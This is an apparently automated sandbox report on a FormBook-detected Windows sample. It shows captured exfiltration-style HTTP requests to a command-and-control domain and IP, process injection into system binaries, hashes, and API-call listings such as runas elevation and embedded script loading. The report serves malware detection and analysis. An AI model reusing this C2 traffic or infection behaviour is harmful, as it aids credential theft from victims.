Ebq4kd=HK56D0Zh/f+HkE+cluS+ceRGlo0l4WJZaYUSmxqA5ntg00zirQMSc4uvCZg9XJf/of65XKQDi8qIprDxhCbNjRrzaLvbSTvd3e6dEUP4+Q//uSNaPzwA+QRsrexv6+HKSOeH7bYKCP7wviPSxCxm0+k+yOPuRZWTJ6yxdayErb+Oj0M1yYIyxJd5HZ/E7s/Mo1z4UP5NxLoB8BVg5TYnc5+F98ESRPip3GPLqNk=
Jan 10, 2025 19:19:11.566744089 CET	322	IN	HTTP/1.1 404 Not Found Server: nginx/1.6.2 Date: Fri, 10 Jan 2025 18:19:11 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Content-Encoding: gzip Data Raw: 38 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 2a 24 a5 27 e7 e7 e4 17 d9 2a 95 67 64 96 a4 2a 81 8c 48 4e cd 2b 49 2d b2 b3 c9 30 44 37 01 28 62 a3 0f 95 06 d9 05 54 04 e5 e5 a5 67 e6 55 e8 1b ea 99 e9 19 21 ab d0 07 d9 01 32 53 1f ea 3e 00 94 85 eb e4 a8 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 83(HML),I310Q/Qp/K&T$'gd*HN+I-0D7(bTgU!2S>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
11	192.168.2.7	54328	130.185.109.77	80	6160	C:\Program Files (x86)\TdofKcfhMfuNvCiBIARFuKLKxhvsSZqyGhgoFpZm\GVXcOVOPuWmumK.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 19:19:13.491508007 CET	1791	OUT	POST /cv1w/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9 Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 1251 Host: www.lgdiamonds.info Origin: http://www.lgdiamonds.info Referer: http://www.lgdiamonds.info/cv1w/ User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30 Data Raw: 45 62 71 34 6b 64 3d 48 4b 35 36 44 30 5a 68 2f 66 2b 48 6b 45 2b 63 6c 75 53 2b 63 65 52 47 6c 6f 30 6c 34 57 4a 5a 61 59 55 53 6d 78 71 41 35 6d 56 67 30 6d 4c 69 71 78 4d 53 64 34 75 76 42 5a 68 61 58 4a 65 6e 6f 66 53 39 58 4b 56 34 69 2b 69 49 6d 75 58 78 6f 51 7a 4e 74 52 72 7a 54 72 76 50 57 54 76 49 33 65 71 5a 45 55 66 34 2b 51 2f 2f 75 52 56 61 59 79 77 41 74 67 52 6a 6a 2b 78 64 77 75 48 69 53 4b 7a 6c 37 62 4d 67 43 38 7a 77 75 43 66 53 69 41 70 6d 32 65 6b 38 78 4f 50 6d 52 5a 4b 41 4a 2b 53 4c 64 66 6d 2b 72 63 4b 4f 68 43 70 57 6f 6f 64 75 6e 36 68 6a 4d 2f 6e 46 38 2f 54 73 77 46 79 45 52 74 6f 72 7a 35 41 37 77 68 56 76 39 33 52 5a 42 49 43 78 78 2b 49 6c 65 62 2f 43 73 30 6a 74 70 49 38 77 44 30 71 68 4e 39 55 36 4e 71 53 43 35 58 59 51 67 56 4b 4c 78 33 30 39 48 39 45 42 73 36 35 43 75 50 64 35 56 63 50 47 2b 33 6a 35 64 2b 4f 44 6f 6f 50 6e 6e 54 4a 38 4e 48 6f 37 59 62 72 76 77 51 2f 6f 45 77 6e 63 2b 70 69 44 77 44 79 52 72 37 50 54 38 49 76 38 6c 48 74 4d 45 37 33 61 7a 30 64 [TRUNCATED] Data Ascii: Ebq4kd=HK56D0Zh/f+HkE+cluS+ceRGlo0l4WJZaYUSmxqA5mVg0mLiqxMSd4uvBZhaXJenofS9XKV4i+iImuXxoQzNtRrzTrvPWTvI3eqZEUf4+Q//uRVaYywAtgRjj+xdwuHiSKzl7bMgC8zwuCfSiApm2ek8xOPmRZKAJ+SLdfm+rcKOhCpWoodun6hjM/nF8/TswFyERtorz5A7whVv93RZBICxx+Ileb/Cs0jtpI8wD0qhN9U6NqSC5XYQgVKLx309H9EBs65CuPd5VcPG+3j5d+ODooPnnTJ8NHo7YbrvwQ/oEwnc+piDwDyRr7PT8Iv8lHtME73az0dHd4jSqzBCY97DTkEegrHdCL7Urmg6intO6HddWawGUPSNyTbhixMjMHK5mP4Gbdwk+QaNxiYncz45wdMBgiawEeCrfJMDQk1YYnKE01H2nJKAGLGGmGlWLsCSJq2Yw7C9xlZUPOTr+WAvVNYJse2vlMZD9AceBGCoD2lyLGGRRHf0LxVLWb+95rWqoyJ7nfjem5I3sSG8qmJzAGInG1T9IpfE17e1I+krW8h59jKznIeYHvifQfJogt8tsSbPWiPJBwgdGN/lWGdYjQvIdr+qJfaa59NW1yvTSJOPaAyCI+JklmQFKUL8qb+K7Hogr8Ee5eyoZJZq25+HKfmaIZk2SkeGIBujL6op5JO1+fxVb7fs15qA2ddi5JV0pfc38+oSYBiA/S1iv7uvwUwhrNG9C7T13WqgfJT5WptImVAl6rsnegCkOQ7cF8OESxR2WVkK6Mk4k7ay77cqCkIH7GDZ2gYP9wNdTiuqmKQyoVe2oe5ypKsrNZCRRurrITaAPr8+KH95DkNV0Tbygdtxl8bDBQFSYR2ZXHS9XPqYPHg9bXBO6OG66fHRTG+gDjvrzliwsPbskrOlDd1ruAZ5AFhXdU7ixKi1TzTA202B8PV0q9D09IV6LihV+zz9YCKbK8YcxW4uJhWZb0IbPNxshkxGvt4pFI+DLw6La [TRUNCATED]
Jan 10, 2025 19:19:14.114927053 CET	322	IN	HTTP/1.1 404 Not Found Server: nginx/1.6.2 Date: Fri, 10 Jan 2025 18:19:14 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close Content-Encoding: gzip Data Raw: 38 33 0d 0a 1f 8b 08 00 00 00 00 00 00 03 b3 c9 28 c9 cd b1 e3 e5 b2 c9 48 4d 4c b1 b3 29 c9 2c c9 49 b5 33 31 30 51 f0 cb 2f 51 70 cb 2f cd 4b b1 d1 87 08 da e8 83 95 00 95 26 e5 a7 54 2a 24 a5 27 e7 e7 e4 17 d9 2a 95 67 64 96 a4 2a 81 8c 48 4e cd 2b 49 2d b2 b3 c9 30 44 37 01 28 62 a3 0f 95 06 d9 05 54 04 e5 e5 a5 67 e6 55 e8 1b ea 99 e9 19 21 ab d0 07 d9 01 32 53 1f ea 3e 00 94 85 eb e4 a8 00 00 00 0d 0a 30 0d 0a 0d 0a Data Ascii: 83(HML),I310Q/Qp/K&T$'gd*HN+I-0D7(bTgU!2S>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
12	192.168.2.7	54329	130.185.109.77	80	6160	C:\Program Files (x86)\TdofKcfhMfuNvCiBIARFuKLKxhvsSZqyGhgoFpZm\GVXcOVOPuWmumK.exe

Timestamp	Bytes transferred	Direction	Data
Jan 10, 2025 19:19:16.038676977 CET	488	OUT	GET /cv1w/?Ebq4kd=KIRaABhBgujzn3KWmND9cpAT+69hyUlHf/kT3kOA8kciiH38vV9KVMyDNvMwVI643JmGXckFkIiptpvhjjDetRqgMb6LfgDY9OvnJHDjkSrllgUtIBAwrRtYgMla7fjjdtGa4rVNLvrP&zNH=npZPFHp HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,/;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close Host: www.lgdiamonds.info User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.4; en-gb; GT-S5301 Build/IMM76D) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Jan 10, 2025 19:19:16.649893045 CET	317	IN	HTTP/1.1 404 Not Found Server: nginx/1.6.2 Date: Fri, 10 Jan 2025 18:19:16 GMT Content-Type: text/html Content-Length: 168 Connection: close Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 36 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.6.2</center></body></html>

Target ID:	1
Start time:	13:17:09
Start date:	10/01/2025
Path:	C:\Users\user\Desktop\cNDddMAF5u.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\cNDddMAF5u.exe"
Imagebase:	0x6a0000
File size:	1'266'176 bytes
MD5 hash:	CAF89165D3DFDDE3273CCE4DEADE7DB4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	13:17:12
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\svchost.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\cNDddMAF5u.exe"
Imagebase:	0x5d0000
File size:	46'504 bytes
MD5 hash:	1ED18311E3DA35942DB37D15FA40CC5B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.1703918121.0000000006920000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.1701029410.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.1702227169.0000000003F90000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	5
Start time:	15:08:18
Start date:	10/01/2025
Path:	C:\Program Files (x86)\TdofKcfhMfuNvCiBIARFuKLKxhvsSZqyGhgoFpZm\GVXcOVOPuWmumK.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\TdofKcfhMfuNvCiBIARFuKLKxhvsSZqyGhgoFpZm\GVXcOVOPuWmumK.exe"
Imagebase:	0x190000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.2585572364.0000000002E90000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	6
Start time:	15:08:19
Start date:	10/01/2025
Path:	C:\Windows\SysWOW64\rasdial.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\SysWOW64\rasdial.exe"
Imagebase:	0xa50000
File size:	19'456 bytes
MD5 hash:	A280B0F42A83064C41CFFDC1CD35136E
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.2581837610.0000000003200000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.2585563480.0000000004EC0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.2585328157.0000000004E70000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	7
Start time:	15:08:33
Start date:	10/01/2025
Path:	C:\Program Files (x86)\TdofKcfhMfuNvCiBIARFuKLKxhvsSZqyGhgoFpZm\GVXcOVOPuWmumK.exe
Wow64 process (32bit):	true
Commandline:	"C:\Program Files (x86)\TdofKcfhMfuNvCiBIARFuKLKxhvsSZqyGhgoFpZm\GVXcOVOPuWmumK.exe"
Imagebase:	0x190000
File size:	140'800 bytes
MD5 hash:	32B8AD6ECA9094891E792631BAEA9717
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.2587932076.0000000005510000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	11
Start time:	15:08:45
Start date:	10/01/2025
Path:	C:\Program Files\Mozilla Firefox\firefox.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\Mozilla Firefox\Firefox.exe"
Imagebase:	0x7ff722870000
File size:	676'768 bytes
MD5 hash:	C86B1BE9ED6496FE0E0CBE73F81D8045
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	3.1%
Dynamic/Decrypted Code Coverage:	1%
Signature Coverage:	5.1%
Total number of Nodes:	1821
Total number of Limit Nodes:	43

Executed Functions

Function 006A42DE Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 235
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 006A430D

Part of subcall function 006A6B57: _wcslen.LIBCMT ref: 006A6B6A

GetCurrentProcess.KERNEL32(?,0073CB64,00000000,?,?), ref: 006A4422
IsWow64Process.KERNEL32(00000000,?,?), ref: 006A4429
LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 006A4454
GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 006A4466
GetNativeSystemInfo.KERNELBASE(?,?,?), ref: 006A4474
FreeLibrary.KERNEL32(00000000,?,?), ref: 006A447B
GetSystemInfo.KERNEL32(?,?,?), ref: 006A44A0

Strings

GetNativeSystemInfo, xrefs: 006A4460
|O, xrefs: 006E36F8
kernel32.dll, xrefs: 006A444F

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
String ID: GetNativeSystemInfo$kernel32.dll$|O
API String ID: 3290436268-3101561225
Opcode ID: e4e769239bdc333128132d07840455a46412c319d0091cbc1fbcb510493c2a78
Instruction ID: 0286a7249e77780ef1528ec5e45c527fe1781fa23d07fc625699ffe720b7dd7f
Opcode Fuzzy Hash: e4e769239bdc333128132d07840455a46412c319d0091cbc1fbcb510493c2a78
Instruction Fuzzy Hash: 82A1E37190A3D0CFCB12DB7D7C441D57FE6AB67380B84C499E08D93B62D6684985CB2D

Function 006A42A2 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 61
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateStreamOnHGlobal.COMBASE(00000000,00000001,?,?,?,?,?,006A50AA,?,?,00000000,00000000), ref: 006A42B2
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,006A50AA,?,?,00000000,00000000), ref: 006A42C9
LoadResource.KERNEL32(?,00000000,?,?,006A50AA,?,?,00000000,00000000,?,?,?,?,?,?,006A4F20), ref: 006E35BE
SizeofResource.KERNEL32(?,00000000,?,?,006A50AA,?,?,00000000,00000000,?,?,?,?,?,?,006A4F20), ref: 006E35D3
LockResource.KERNEL32(006A50AA,?,?,006A50AA,?,?,00000000,00000000,?,?,?,?,?,?,006A4F20,?), ref: 006E35E6

Strings

SCRIPT, xrefs: 006A42BF

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: b68ee4d564867bdfb38b96839ef0101cf8b2934289cbb6a7cfbebea4d1f70c33
Instruction ID: 8a6020bec496b86d6276c9284a85906cf6092536865a589822c79bfc43482068
Opcode Fuzzy Hash: b68ee4d564867bdfb38b96839ef0101cf8b2934289cbb6a7cfbebea4d1f70c33
Instruction Fuzzy Hash: 56115E71240701BFE7229B65DC49F677BBAEFC6B52F148169F502E6250DBB1DD008B60

Function 006E2BA5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetCurrentDirectoryW.KERNEL32(?), ref: 006A2B6B

Part of subcall function 006A3A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00771418,?,006A2E7F,?,?,?,00000000), ref: 006A3A78

Part of subcall function 006A9CB3: _wcslen.LIBCMT ref: 006A9CBD

GetForegroundWindow.USER32(runas,?,?,?,?,?,00762224), ref: 006E2C10
ShellExecuteW.SHELL32(00000000,?,?,00762224), ref: 006E2C17

Strings

runas, xrefs: 006E2C0B

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: CurrentDirectoryExecuteFileForegroundModuleNameShellWindow_wcslen
String ID: runas
API String ID: 448630720-4000483414
Opcode ID: b2d77a711f6f4f37b4a07e2235b5ebd52db3eb14a478b8e51fef1262332372e6
Instruction ID: 8128e3a2118f40e1595c51636fda5d95f53dac3c18227f5e1d762b1f13f3df31
Opcode Fuzzy Hash: b2d77a711f6f4f37b4a07e2235b5ebd52db3eb14a478b8e51fef1262332372e6
Instruction Fuzzy Hash: ED110A311083925BCB84FF24D8619BE77A79F93344F44542CF047121A3CF289D4A8F2A

Function 0070DBBE Relevance: 6.0, APIs: 4, Instructions: 29filestringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,006E5222), ref: 0070DBCE
GetFileAttributesW.KERNELBASE(?), ref: 0070DBDD
FindFirstFileW.KERNELBASE(?,?), ref: 0070DBEE
FindClose.KERNEL32(00000000), ref: 0070DBFA

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: FileFind$AttributesCloseFirstlstrlen
String ID:
API String ID: 2695905019-0
Opcode ID: 48944b12a66b0631b100a0a83a3b88d4564a549917efcda5945522e0063fb497
Instruction ID: e5d79f1d81dfda30635c50e78e9cd2be234cd7f60476515577dfb50af226df8b
Opcode Fuzzy Hash: 48944b12a66b0631b100a0a83a3b88d4564a549917efcda5945522e0063fb497
Instruction Fuzzy Hash: 41F0A7314106249BF2316BB89C0D46B3BACAE01335F108702F835D10E0EBB85D5486AA

Function 006ABF40 Relevance: 2.4, Strings: 1, Instructions: 1178COMMON

Download Yara Rule

Strings

p#w, xrefs: 006F07CE

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: BuffCharUpper
String ID: p#w
API String ID: 3964851224-3682083516
Opcode ID: 4f6269a2da6d0a78d615cf2439d7cdef69a0d9510e8b3ee4fe31379ddf7f486a
Instruction ID: 35e093dc2a3ef4a6d695ecae8bf61d86c93b400caf257f7c87d86ea990e0cdf4
Opcode Fuzzy Hash: 4f6269a2da6d0a78d615cf2439d7cdef69a0d9510e8b3ee4fe31379ddf7f486a
Instruction Fuzzy Hash: D4A249706083019FD754EF18C480B6ABBE2BF8A314F14896DE99A8B352D775EC45CF92

Function 006AD730 Relevance: 21.6, APIs: 14, Instructions: 629windowsleeptimeCOMMON

Download Yara Rule

APIs

GetInputState.USER32 ref: 006AD807
timeGetTime.WINMM ref: 006ADA07
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 006ADB28
TranslateMessage.USER32(?), ref: 006ADB7B
DispatchMessageW.USER32(?), ref: 006ADB89
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 006ADB9F
Sleep.KERNEL32(0000000A), ref: 006ADBB1

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
String ID:
API String ID: 2189390790-0
Opcode ID: fc2dff09ae378f00b3cc1ad3c7fba78d2e56b84d04349de794613c95ebcd1283
Instruction ID: 2a45d2118c6711c87c55a15b3a1b8d0a641850b4ca1e8b7692805f09523def40
Opcode Fuzzy Hash: fc2dff09ae378f00b3cc1ad3c7fba78d2e56b84d04349de794613c95ebcd1283
Instruction Fuzzy Hash: F3420070208206DFE728EB24C854BBAB7E2BF46304F14851DE5668B7A1C774EC85CF92

Function 006A2CD4 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53
windowregistryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSysColorBrush.USER32(0000000F), ref: 006A2D07
RegisterClassExW.USER32(00000030), ref: 006A2D31
RegisterWindowMessageW.USER32(TaskbarCreated), ref: 006A2D42
InitCommonControlsEx.COMCTL32(?), ref: 006A2D5F
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 006A2D6F
LoadIconW.USER32(000000A9), ref: 006A2D85
ImageList_ReplaceIcon.COMCTL32(000000FF,00000000), ref: 006A2D94

Strings

TaskbarCreated, xrefs: 006A2D37
AutoIt v3 GUI, xrefs: 006A2D23
0, xrefs: 006A2CE9
+, xrefs: 006A2CF0

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: IconImageList_Register$BrushClassColorCommonControlsCreateInitLoadMessageReplaceWindow
String ID: +$0$AutoIt v3 GUI$TaskbarCreated
API String ID: 2914291525-1005189915
Opcode ID: 5404b81c200fb610805079327358df7b790f2f9c34ec256ab62939501c4a8d0c
Instruction ID: 3adfbd928a02a58ac3d66baf190147555b57b50fe3e811ac828073168a4e7dc6
Opcode Fuzzy Hash: 5404b81c200fb610805079327358df7b790f2f9c34ec256ab62939501c4a8d0c
Instruction Fuzzy Hash: 2221FCB5911348AFEB01DF98EC49BDDBBB4FB08741F00811AF615B6290D7B95540CF98

Function 006E065B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 006E039A: CreateFileW.KERNELBASE(00000000,00000000,?,006E0704,?,?,00000000,?,006E0704,00000000,0000000C), ref: 006E03B7

GetLastError.KERNEL32 ref: 006E076F
__dosmaperr.LIBCMT ref: 006E0776
GetFileType.KERNELBASE(00000000), ref: 006E0782
GetLastError.KERNEL32 ref: 006E078C
__dosmaperr.LIBCMT ref: 006E0795
CloseHandle.KERNEL32(00000000), ref: 006E07B5
CloseHandle.KERNEL32(?), ref: 006E08FF
GetLastError.KERNEL32 ref: 006E0931
__dosmaperr.LIBCMT ref: 006E0938

Strings

H, xrefs: 006E08BD

Memory Dump Source

Source File: 00000001.00000002.1366022221.00000000006A1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000001.00000002.1365999747.00000000006A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.000000000073C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366091732.0000000000762000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366147019.000000000076C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1366166225.0000000000774000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_6a0000_cNDddMAF5u.jbxd

Similarity

API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
String ID: H
API String ID: 4237864984-2852464175
Opcode ID: 8837c25d59726e8245547b561a3f59a685e5ba80047818bf2675432e3d0191be
Instruction ID: cff1588d4b9a200b82300903f62f55f56ea9022393b02b96f0c34831e7fe342b
Opcode Fuzzy Hash: 8837c25d59726e8245547b561a3f59a685e5ba80047818bf2675432e3d0191be
Instruction Fuzzy Hash: 03A13632A002848FEF19AF68D851BAE3BA2EB06320F14415DF815AB3D1D7759D93CB95

Function 006A344D Relevance: 17.7, APIs: 6, Strings: 4, Instructions: 201
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 006A3A5A: GetModuleFileNameW.KERNEL32(00000000,?,00007FFF,00771418,?,006A2E7F,?,?,?,00000000), ref: 006A3A78

Part of subcall function 006A3357: GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 006A3379

